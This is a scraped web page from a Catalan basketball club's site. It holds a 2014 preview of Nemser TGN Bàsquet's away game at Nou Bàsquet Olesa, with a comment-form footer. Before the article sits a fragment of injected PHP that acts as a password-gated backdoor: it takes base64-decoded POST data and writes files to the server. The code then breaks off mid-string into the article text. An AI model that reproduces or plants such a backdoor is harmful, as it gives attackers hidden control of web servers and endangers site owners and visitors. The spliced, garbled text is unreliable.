function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser intentarà trencar la mala ratxa en la seva visita al Nou Olesa (diumenge 19:30 h) - Tgn Bàsquet Club -

El Nemser intentarà trencar la mala ratxa en la seva visita al Nou Olesa (diumenge 19:30 h)

By
Updated: març 8, 2014

El Nemser TGN Bàsquet intentarà demà, a partir de dos quarts de vuit del vespre, trencar la mala ratxa de dues victòries consecutives en la seva visita al Nu Bàsquet Olesa. L’equip de Juan Carlos Arjona no podrà comptar amb Esther Cabré ni tampoc amb Laura Martínez per un partit contra un rival potent que actualment ocupa la quarta posició de la taula classificatòria (13 victòries i 7 derrotes, mentre que les liles són onzenes amb un balanç de 10 i 10). El triomf seria importantíssim per les visitants perquè els hi donaria possibilitats de fugir de les zones de play-off de descens que actualment ocupen.

El Nou Bàsquet Olesa és un equip que compta amb una de les millors pivots de la lliga, M. Eulàlia Vila, que va jugar a Lliga Femenina 1. També disposa de bones exteriors que han militat a Copa Catalunya, com Guillamón. Amb aquest arsenal, el Nou Bàsquet Olesa practica un joc fluid, àgil i que no especula en atac. Així, té una mitjana de 63 punts encistellats per partit a casa mentre que només en rep 51. Cal tenir en compte, però, que no és imbatible, doncs ja ha perdut dos partits a casa seva. El Nemser, però, tampoc és un especialista a domicili perquè només ha guanyat tres partits fora de la seva pista.

En la primera volta, el conjunt lila es va imposar per un ajustat 63-61

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *